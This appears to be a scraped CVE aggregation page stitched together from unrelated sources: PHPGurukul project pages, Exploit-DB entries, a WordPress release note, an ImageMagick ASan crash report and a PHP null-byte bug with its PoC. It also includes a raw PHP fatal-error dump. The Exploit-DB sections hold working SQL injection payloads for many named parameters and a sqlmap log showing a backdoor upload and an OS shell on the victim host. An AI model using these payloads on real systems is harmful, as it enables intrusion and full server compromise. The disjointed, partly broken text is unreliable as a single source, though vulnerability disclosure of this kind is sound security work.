PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to XSS, as demonstrated by the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName parameter in add-product.php.

**Dairy Farm Shop Management System Using PHP and MySQL**

  

**Project Name**               :  Dairy Farm Shop Management System Project (DFSMS)

**Language Used                   :**  PHP

**Database                              :**  MySQL

**User Interface Design       :**  HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser                       :**  Mozilla, Google Chrome, IE8, OPERA

**Software                               :**  XAMPP / Wamp / Mamp/ Lamp (anyone)

DFSMS is a web-based application which manages the products of dairy shop. It has one module i.e. admin who manages all the functions of the dairy shop.

**Admin Features :**

**Dashboard:** In this section, admin can see all detail in brief like Total listed categories, companies, products and also see the sales.

**Category:** In this section, admin can add new categories and edit, delete old categories.

**Company:** In this section, admin can add new companies and edit, delete old companies.

**Product:** In this section, admin can add new products and edit old products.

**Search:** In this section, admin can search for a product then add the product into the cart and generate invoice /receipt.

**Invoices:** In this section, admin can view all generated invoices/receipts.

**Reports**: In this section, admin can generate two reports, one is B/w date and another one is for sales.

Admin can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Login Page**

**Login Page**

**Admin Dashboard**

**Admin Dashboard**

**Add Product Page**

**Add Product Page**

**Invoice Page**

**Invoice**

**How to run the Dairy Farm Shop Management System Project (DFSMS)**

1\. Download the zip file

2\. Extract the file and copy dfsms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4\. Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with name dfsms

6\. Import dfsms.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/dfsms

**Admin Credential**

**Username:** admin  
**Password:** Test@123

**View Demo——————————————**

Download Full Source Code (DFSMS)

Size: 9.84 MB

Version: V 1.1

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-5308: Dairy Farm Shop Management System Project, Dairy Farm Shop Management System in Php

PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file.

**Hostel Management System 2.0 - 'id' SQL Injection**

**Platform:****PHP**

**Date:****2020-01-06**

  

    # Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
    # Google Dork: intitle: "Hostel management system"
    # Date: 2020-01-03
    # Exploit Author: FULLSHADE
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/hostel-management-system/
    # Version: v2.0
    # Tested on: Windows
    # CVE : N/A
    
    Description:
    
    The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
    SQL injection via the 'id' parameter on the full-profile.php page.
    
    ==================== 1. SQLi ====================
    
    http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
    
    THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
    user has the full ability to run system commands via --os-shell and fully compromise the system
    
    GET parameter 'id' is vulnerable.
    
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-3444' OR 1650=1650#
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=1' OR SLEEP(5)-- slKU
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 29 columns
        Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    
    [14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
    [14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
    [14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a] y
    command standard output: 'john-pc\john'
    os-shell>

CVE-2020-5510: OffSec’s Exploit Database Archive

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
    # Google Dork: N/A
    # Date: 2020-01-03
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    # CVE: N/A
    
    # The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
    # SQL injection in multiple areas. The most severe of these is the username 
    # parameter on the login page as this injection can be done unauthenticated.
    
    
    ================================ 'username' - SQLi ================================
    
    POST /dfsms/index.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    username=test&password=test&login=
    
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'category' & 'categorycode' - SQLi ================================
    
    POST /dfsms/add-category.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/add-category.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    category=test&categorycode=test&submit=
    
    ---
    Parameter: category (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    ---
    Parameter: categorycode (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'companyname' - SQLi ================================
    
    ---
    Parameter: companyname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'productname' & 'productprice' - SQLi ================================
    
    ---
    Parameter: productname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
    ---
    ---
    Parameter: productprice (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'fromdate' & 'todate' - SQLi ================================
    
    ---
    Parameter: todate (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 5 columns
        Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
    
    Parameter: fromdate (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
    ---
    
    
    
    ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
    
    ---
    Parameter: emailid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: adminname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: mobilenumber (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
    ---

CVE-2020-5307: OffSec’s Exploit Database Archive

Codoforum 4.8.3 allows XSS via a post using parameters display name, title name, or content.

  
**Notice**: Trying to access array offset on value of type bool in **/home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/Controller/forum.php** on line **199**

**Fatal error**: Uncaught PDOException: SQLSTATE\[42000\]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'AND t.topic\_status <> 0 AND ( EXISTS (SELECT 1 FROM codo\_permissions AS per...' at line 3 in /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Forum/Category.php:214 Stack trace: #0 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Forum/Category.php(214): PDO->query('SELECT COUNT(t....') #1 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/Controller/forum.php(200): CODOF\\Forum\\Category->get\_total\_num\_topics(NULL) #2 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/routes.php(483): Controller\\forum->category('news-and-announ...', 1) #3 \[internal function\]: {closure}('news-and-announ...') #4 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Router/ in **/home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Forum/Category.php** on line **214**

CVE-2020-5306

The Postie plugin 1.9.40 for WordPress allows XSS, as demonstrated by a certain payload with jaVasCript:/* at the beginning and a crafted SVG element.

CVE-2019-20204: Postie

An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.

CVE-2019-20141

wp_kses_bad_protocol in wp-includes/kses.php in WordPress before 5.3.1 mishandles the HTML5 colon named entity, allowing attackers to bypass input sanitization, as demonstrated by the javascript&colon; substring.

WordPress 5.3.1 is now available!

This security and maintenance release features 46 fixes and enhancements. Plus, it adds a number of security fixes—see the list below.

WordPress 5.3.1 is a short-cycle maintenance release. The next major release will be version 5.4.

You can download WordPress 5.3.1 by clicking the button at the top of this page, or visit your **Dashboard → Updates** and click **Update Now**.

If you have sites that support automatic background updates, they’ve already started the update process.

**Security updates**

Four security issues affect WordPress versions 5.3 and earlier; version 5.3.1 fixes them, so you’ll want to upgrade. If you haven’t yet updated to 5.3, there are also updated versions of 5.2 and earlier that fix the security issues.

*   Props to Daniel Bachhuber for finding an issue where an unprivileged user could make a post sticky via the REST API.
*   Props to Simon Scannell of RIPS Technologies for finding and disclosing an issue where cross-site scripting (XSS) could be stored in well-crafted links.
*   Props to the WordPress.org Security Team for hardening wp_kses_bad_protocol() to ensure that it is aware of the named colon attribute.
*   Props to Nguyen The Duc for discovering a stored XSS vulnerability using block editor content.

**Maintenance updates**

Here are a few of the highlights:

*   Administration: improvements to admin form controls height and alignment standardization (see related dev note), dashboard widget links accessibility and alternate color scheme readability issues (see related dev note).
*   Block editor: fix Edge scrolling issues and intermittent JavaScript issues.
*   Bundled themes: add customizer option to show/hide author bio, replace JS based smooth scroll with CSS (see related dev note) and fix Instagram embed CSS.
*   Date/time: improve non-GMT dates calculation, fix date format output in specific languages and make get_permalink() more resilient against PHP timezone changes.
*   Embeds: remove CollegeHumor oEmbed provider as the service doesn’t exist anymore.
*   External libraries: update sodium_compat.
*   Site health: allow the remind interval for the admin email verification to be filtered.
*   Uploads: avoid thumbnails overwriting other uploads when filename matches, and exclude PNG images from scaling after upload.
*   Users: ensure administration email verification uses the user’s locale instead of the site locale.

For more information, browse the full list of changes on Trac or check out the version 5.3.1 HelpHub documentation page.

**Thanks!**

In addition to the security researchers mentioned above, thank you to everyone who contributed to WordPress 5.3.1:

123host, acosmin, Adam Silverstein, Albert Juhé Lluveras, Alex Concha, Alex Mills, Anantajit JG, Anders Norén, andraganescu, Andrea Fercia, Andrew Duthie, Andrew Ozz, Andrey “Rarst” Savchenko, aravindajith, archon810, Ate Up With Motor, Ayesh Karunaratne, Birgir Erlendsson (birgire), Boga86, Boone Gorges, Carolina Nymark, Chetan Prajapati, Csaba (LittleBigThings), Dademaru, Daniel Bachhuber, Daniele Scasciafratte, Daniel Richards, David Baumwald, David Herrera, Dion hulse, ehtis, Ella van Durpe, epiqueras, Fabian, Felix Arntz, flaviozavan, Garrett Hyder, Glenn, Grzegorz (Greg) Ziółkowski, Grzegorz.Janoszka, Hareesh Pillai, Ian Belanger, ispreview, Jake Spurlock, James Huff, James Koster, Jarret, Jasper van der Meer, Jb Audras, jeichorn, Jer Clarke, Jeremy Felt, Jip Moors, Joe Hoyle, John James Jacoby, Jonathan Desrosiers, Jonny Harris, Joost de Valk, Jorge Costa, Joy, Juliette Reinders Folmer, justdaiv, Kelly Dwan, Kharis Sulistiyono, Kite, kyliesabra, lisota, lukaswaudentio, Maciej Mackowiak, marcelo2605, Marius L. J., Mat Lipe, mayanksonawat, Mel Choyce-Dwan, Michael Arestad, miette49, Miguel Fonseca, mihdan, Mike Auteri, Mikko Saari, Milan Petrovic, Mukesh Panchal, NextScripts, Nick Daugherty, Niels Lange, noyle, Ov3rfly, Paragon Initiative Enterprises, Paul Biron, Peter Wilson, Rachel Peter, Riad Benguella, Ricard Torres, Roland Murg, Ryan McCue, Ryan Welcher, SamuelFernandez, sathyapulse, Scott Taylor, scvleon, Sergey Biryukov, sergiomdgomes, SGr33n, simonjanin, smerriman, steevithak, Stephen Bernhardt, Stephen Edgar, Steve Dufresne, Subrata Mal, Sultan Nasir Uddin, Sybre Waaijer, Tammie Lister, Tanvirul Haque, Tellyworth, timon33, Timothy Jacobs, Timothée Brosille, tmatsuur, Tung Du, Veminom, vortfu, waleedt93, williampatton, wpgurudev, and Zack Tollman.

CVE-2019-20041: WordPress 5.3.1 Security and Maintenance Release

In wp-includes/formatting.php in WordPress 3.7 to 5.3.0, the function wp_targeted_link_rel() can be used in a particular way to result in a stored cross-site scripting (XSS) vulnerability. This has been patched in WordPress 5.3.1, along with all the previous WordPress versions from 3.7 to 5.3 via a minor release.

CVE-2019-20042

In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer overflow in the function WriteSGIImage of coders/sgi.c.

**Prerequisites**

*   I have written a descriptive issue title
*   I have verified that I am using the latest version of ImageMagick
*   I have searched open and closed issues to ensure it has not already been reported

**Description**

There is a heap buffer overflow vulnerability in function WriteSGIImage of coders/sgi.c.

**Steps to Reproduce**

poc  
magick convert $poc ./test.sgi  
=================================================================  
==41720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f70c67db7f8 at pc 0x0000006c216f bp 0x7ffea64ddb50 sp 0x7ffea64ddb40  
WRITE of size 1 at 0x7f70c67db7f8 thread T0  
    #0 0x6c216e in WriteSGIImage coders/sgi.c:1051  
    #1 0x849036 in WriteImage MagickCore/constitute.c:1159  
    #2 0x849d5b in WriteImages MagickCore/constitute.c:1376  
    #3 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305  
    #4 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185  
    #5 0x4100a1 in MagickMain utilities/magick.c:149  
    #6 0x410282 in main utilities/magick.c:180  
    #7 0x7f70c10c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)  
    #8 0x40fbb8 in _start (/home/test/temp/ImageMagick/utilities/magick+0x40fbb8)

0x7f70c67db7f8 is located 8 bytes to the left of 524288-byte region [0x7f70c67db800,0x7f70c685b800)  
allocated by thread T0 here:  
    #0 0x7f70c5868076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)  
    #1 0x4408c7 in AcquireAlignedMemory MagickCore/memory.c:265  
    #2 0x440beb in AcquireVirtualMemory MagickCore/memory.c:621  
    #3 0x6c1ead in WriteSGIImage coders/sgi.c:1030  
    #4 0x849036 in WriteImage MagickCore/constitute.c:1159  
    #5 0x849d5b in WriteImages MagickCore/constitute.c:1376  
    #6 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305  
    #7 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185  
    #8 0x4100a1 in MagickMain utilities/magick.c:149  
    #9 0x410282 in main utilities/magick.c:180  
    #10 0x7f70c10c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow coders/sgi.c:1051 WriteSGIImage  
Shadow bytes around the buggy address:  
  0x0fee98cf36a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
=>0x0fee98cf36f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]  
  0x0fee98cf3700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable:           00  
 Partially addressable: 01 02 03 04 05 06 07  
  Heap left redzone:       fa  
  Heap right redzone:      fb  
  Freed heap region:       fd  
  Stack left redzone:      f1  
  Stack mid redzone:       f2  
  Stack right redzone:     f3  
  Stack partial redzone:   f4  
  Stack after return:      f5  
  Stack use after scope:   f8  
  Global redzone:          f9  
  Global init order:       f6  
  Poisoned by user:        f7  
  Container overflow:      fc  
  Array cookie:            ac  
  Intra object redzone:    bb  
  ASan internal:           fe  
==41720==ABORTING

**System Configuration**

*   ImageMagick version:  
    Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-29 https://imagemagick.org  
    Copyright: ? 1999-2019 ImageMagick Studio LLC  
    License: https://imagemagick.org/script/license.php  
    Features: Cipher DPC HDRI OpenMP(4.0)   
    Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib
*   Environment (Operating system, version and so on):  
    Distributor ID:	Ubuntu  
    Description:	Ubuntu 16.04.1 LTS  
    Release:	16.04  
    Codename:	xenial
*   Additional information:

CVE-2019-19948: heap-buffer-overflow in WriteSGIImage of coders/sgi.c · Issue #1562 · ImageMagick/ImageMagick

In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 on Windows, PHP link() function accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.

Sec Bug #78862

link() silently truncates after a null byte on Windows

Submitted:

2019-11-23 09:23 UTC

Modified:

2019-12-16 19:01 UTC

From:

ryat@php.net

Assigned:

stas (profile)

Status:

Closed

Package:

Filesystem function related

PHP Version:

7.3.12

OS:

Windows

Private report:

No

CVE-ID:

2019-11044

 **\[2019-11-23 09:23 UTC\] ryat@php.net**

Description:
------------
ext/standard/link\_win32.c:
\`\`\`
PHP\_FUNCTION(link)
{
	...
	if (zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "ss", &frompath, &frompath\_len, &topath, &topath\_len) == FAILURE) {
		return;
	}
\`\`\`

PoC for Windows:
\`\`\`
<?php

link("ryat\\x00php", "php\\x00ryat");

?>
\`\`\`

Fix:
\`\`\`
if (zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "pp", &frompath, &frompath\_len, &topath, &topath\_len) == FAILURE) 
\`\`\`

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-11-23 12:07 UTC\] cmb@php.net**

\-Status: Open +Status: Verified \-Package: \*General Issues +Package: Filesystem function related \-Assigned To: +Assigned To: stas

 **\[2019-11-30 22:01 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2019-11044

 **\[2019-12-16 19:02 UTC\] stas@php.net**

\-Status: Verified +Status: Closed

Tag

#php